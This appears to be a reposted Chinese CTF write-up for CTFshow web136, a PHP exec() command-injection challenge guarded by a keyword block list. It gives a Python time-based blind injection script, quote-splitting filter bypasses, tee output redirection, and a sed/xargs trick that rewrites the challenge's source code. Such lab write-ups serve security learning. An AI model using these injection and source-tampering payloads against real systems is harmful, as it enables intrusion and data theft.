當前位置：首頁 > 编程语言 > php >内容正文

php

CTFshow php特性 web136

發布時間：2025/4/16 php 16 豆豆

生活随笔收集整理的這篇文章主要介紹了 CTFshow php特性 web136 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

源碼

<?php error_reporting(0); function check($x){if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){die('too young too simple sometimes naive!');} } if(isset($_GET['c'])){$c=$_GET['c'];check($c);exec($c); } else{highlight_file(__FILE__); } ?>

思路

剛開始發現 ‘’ 和 “” 沒被過濾，可以繞過關鍵詞，當時無回顯的話，可以用bash盲注

payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char) payload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)

，還有curl帶出，我用的是 echo xxx | bas''e64 -d | ba''sh,但是命令執行不了，求大佬解答

還有 tee 也可以創建文件

題解

解法1

改了下Y1ng師傅的腳本

#!/usr/bin/env python3 #-*- coding:utf-8 -*- #__author__: 穎奇L'Amore www.gem-love.comimport requests import time as t from urllib.parse import quote as urlen url = 'http://85abd7bc-8396-47d1-81d7-a10e92331e33.challenge.ctf.show/?c=' alphabet = ['{','}', '.','/','@','-','_','=','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']result = '' for i in range(1,100):for char in alphabet:# payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char) #flag.phppayload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)# data = {'cmd':payload}try:start = int(t.time())r = requests.get(url+payload)# r = requests.post(url, data=data)end = int(t.time()) - start# print(i,char)if end >= 3: result += charprint("Flag: "+result)breakexcept Exception as e:print(e)

中間的 . 應該是盲注的時候有一個數據包響應過長導致的
flag格式： ctfshow{8-4-4-4-12}

解法2

用 tee 把 ls / 的輸出，輸出進文件里

?c=ls | tee 1

?c=cat /f149_15_h3r3 | tee 2

解法3

但是看到群主的解法的時候，被震驚到了，居然還能這么玩，可以直接改源碼，tql

sed -i ‘s/book/books/g’ file 把book替換成 books

xargs 可以將管道或標準輸入（stdin）數據轉換成命令行參數，也能夠從文件的輸出中讀取數據。

find . -name ‘*.xml’ |xargs sed -i ‘s/hello/world/g’

參考資料： https://blog.csdn.net/weixin_39731083/article/details/82495950

自己測試了下（多動手.jpg）

也可以用xargs sed批量修改文件

ls | xargs sed -i "s/die/echo/"
把die 替換成 echo
ls | xargs sed -i "s/exec/system/"
把exec 替換成 system

然后就隨便玩了

?c=tac /f*

總結

Y1ng師傅 yyds

總結

以上是生活随笔為你收集整理的CTFshow php特性 web136的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： CTFshow php特性 web135
下一篇：动态规划算法php,php算法学习之动态

php

CTFshow php特性 web136

目錄

源碼

思路

題解

解法1

解法2

解法3

總結

總結